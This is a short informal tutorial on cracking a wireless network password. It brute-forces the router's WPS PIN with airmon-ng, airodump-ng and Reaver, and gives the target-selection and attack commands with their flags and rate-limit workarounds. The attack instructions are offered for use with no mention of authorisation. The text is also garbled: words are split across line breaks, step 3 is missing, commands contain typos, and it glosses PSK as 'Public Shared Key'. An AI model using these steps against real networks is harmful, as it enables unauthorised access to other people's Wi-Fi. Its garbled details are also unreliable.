Step 1: Open a terminal window and find your wireless adapter.

Type in airmon-ng and this will display the wireless adapters you have connected
.
Step 2: Put your Wireless Adapter into monitor mode.
You can do this by typing: airmon-ng start wlan0
//No step 3//
Step 4: Determine which Access Point to attack.
In this step we will find out the BSSID of the access point you want to attack.
This is the unique identifier for the access point.
Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSS
IDs:
Under Auth you will see PSK (Public Shared Key). This cracking process will only w
ork if the network is using PSK.
Take note of the BSSID and the Channel number.
Step 5: Lets get cracking
We will now use Reaver to target the specific BSSID and Channel number to retrie
ve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending o
n the channel and BSSID you are targeting.
-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not re
quired.
As you can see, Reaver starts by trying pin 12345670 against the Public Shared K
ey. It will keep trying pins until the correct one is found. When it is found, t
he access points password will be shown to you! This process can take roughly 2-
8 hours.
Some routers don't Accept multiple requests at short period of time
If u get his message Warning: AP 60 second to try
you might want to add some extra features for weaver like this
eaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -t 10 -x 120 -vv
ERROR:
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking.